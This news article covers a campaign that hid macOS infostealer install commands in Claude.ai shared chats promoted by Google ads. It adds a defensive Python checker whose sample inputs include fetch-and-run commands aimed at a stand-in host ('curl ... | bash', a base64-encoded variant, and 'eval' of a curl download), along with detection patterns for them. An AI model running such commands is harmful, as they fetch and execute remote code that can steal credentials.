Mac Users Targeted Through Claude.ai and Google Ads
Cybercriminals are turning trusted web addresses into delivery routes for macOS malware, using Google’s sponsored search results and Claude.ai’s own shared-chat feature to lure users into running malicious Terminal commands.
The campaign, reported by BleepingComputer on May 10, 2026, targets people searching for Claude-related Mac downloads. Instead of sending victims to an obvious lookalike domain, the ads can display Anthropic’s legitimate claude.ai address. That makes the attack unusually convincing: the link itself may look clean, while the content behind it has been weaponized.
Security engineer Berk Albayrak first flagged the activity after finding a public Claude chat posing as a “Claude Code on Mac” installation guide. The page allegedly framed itself as if it came from Apple Support and instructed users to paste a command into macOS Terminal. According to the report, that command did not install a legitimate tool. It downloaded and executed malware.
BleepingComputer later found a second shared Claude chat using the same social-engineering playbook but relying on different infrastructure. Both versions abused a familiar habit among developers and technical users: copying a one-line install command from a web page and running it locally.
The malware chain used encoded shell instructions to fetch additional payloads from attacker-controlled servers. In one observed case, the first-stage script ran in memory, leaving fewer obvious traces on disk. The server also returned a differently obfuscated payload on repeated requests, so that no two downloads shared the same hash, a tactic that makes hash-based detection less reliable.
One variant checked the victim’s keyboard language settings before continuing. Systems configured with Russian or CIS-region input sources were reportedly skipped, while other machines were profiled. The script gathered details such as external IP address, hostname, macOS version, and keyboard locale before pulling down the next stage through macOS’s built-in scripting engine.
The final objective was credential theft. The malware was described as a MacSync infostealer variant capable of collecting browser credentials, cookies, and macOS Keychain data before sending the stolen material back to the attacker.
The campaign is notable because it weakens a common safety instinct: checking whether the domain looks legitimate. Here, the malicious instructions were hosted inside a real Claude.ai shared chat, so the problem was not just a fake website. It was hostile content living on a trusted platform and amplified through paid search.
For users, the lesson is blunt: do not treat sponsored results, AI-generated guides, or shared chats as trusted installation sources. Claude Code should be installed from Anthropic’s official documentation, and any command that asks for Terminal access should be reviewed carefully before running.
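As an added example (not from the article, BleepingComputer or Anthropic), a small Python pre-flight check of the kind a user or help desk could run over a copied install command before pasting it into Terminal. It looks for the indicators the report describes: a download piped straight into a shell, base64-encoded shell text decoded at run time, eval/source of a fetched stream, and osascript as a downloader (osascript is my assumption for "macOS's built-in scripting engine"); the sample commands and the example.invalid host are constructed.

```python
from __future__ import annotations
import base64
import re

# Indicators drawn from the campaign described above: a download piped straight
# into a shell, base64-encoded shell text decoded at run time, eval/source of a
# fetched stream (in-memory execution), and osascript used as a downloader.
RISK_PATTERNS = {
    "pipe_to_shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|)sh\b"),
    "base64_decode": re.compile(r"\bbase64\s+(-d|--decode|-D)\b"),
    "eval_or_source_stream": re.compile(r"\b(eval|source)\b\s*[\"'$(<]"),
    "osascript": re.compile(r"\bosascript\b"),
}

def decode_base64_literals(command: str) -> list[str]:
    """Return the decoded text of every long base64-looking token in the command."""
    decoded = []
    for token in re.findall(r"[A-Za-z0-9+/]{24,}={0,2}", command):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(c.isprintable() or c.isspace() for c in text):
            decoded.append(text)
    return decoded

def review_command(command: str) -> dict:
    """Flag a copied install command before it is pasted into Terminal.

    Decoded base64 layers are scanned too, so an encoded 'curl ... | bash'
    hidden behind 'echo ... | base64 -d | bash' is still reported."""
    layers = [command] + decode_base64_literals(command)
    findings = {name for layer in layers for name, pat in RISK_PATTERNS.items() if pat.search(layer)}
    if len(layers) > 1:
        findings.add("encoded_shell_text")
    return {"risky": bool(findings), "findings": sorted(findings), "decoded": layers[1:]}

# Constructed samples; example.invalid is a reserved, non-routable test host.
HIDDEN = "curl -fsSL https://example.invalid/i | bash"
SAMPLE_ENCODED = f"echo {base64.b64encode(HIDDEN.encode()).decode()} | base64 -d | bash"
SAMPLE_EVAL = 'eval "$(curl -fsSL https://example.invalid/x)"'
SAMPLE_BENIGN = "curl -O https://example.invalid/notes.txt"

if __name__ == "__main__":
    for sample in (SAMPLE_ENCODED, SAMPLE_EVAL, SAMPLE_BENIGN):
        print(review_command(sample))
```

A hit means "read this before running", not "this is malware": legitimate installers also use fetch-and-pipe and eval patterns, which is exactly why the habit the attackers exploited is risky.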
Sources: BleepingComputer, Anthropic Claude Code docs.